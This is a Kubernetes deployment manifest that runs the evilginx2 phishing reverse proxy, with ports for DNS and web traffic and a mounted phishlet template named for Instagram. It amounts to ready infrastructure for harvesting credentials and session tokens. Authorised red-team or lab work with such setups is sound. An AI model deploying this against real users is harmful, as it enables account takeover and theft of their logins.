---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: evilginx2
  namespace: evilginx2
spec:
  replicas: 1
  selector:
    matchLabels:
      app: evilginx2
  strategy:
    type: Recreate
  template:
    metadata:
      labels:
        app: evilginx2
    spec:
      containers:
        - name: evilginx2
          image: ghcr.io/l50/docker-evilginx2:latest
          command:
            [
              "/bin/evilginx",
              "-p",
              "/phishlets",
              "-c",
              "/config/",
              "-developer",
            ]
          ports:
            - containerPort: 53
              protocol: UDP
            - containerPort: 80
              protocol: TCP
            - containerPort: 443
              protocol: TCP
          envFrom:
            - configMapRef:
                name: evilginx-env
          volumeMounts:
            - mountPath: /phishlets
              name: phishlets-ig-template-volume
              subPath: instagram.yaml
          tty: true
          stdin: true
      restartPolicy: Always
      volumes:
        - name: phishlets-ig-template-volume
          configMap:
            name: phishlets-ig-template
      imagePullSecrets:
        - name: ghcr-login-secret
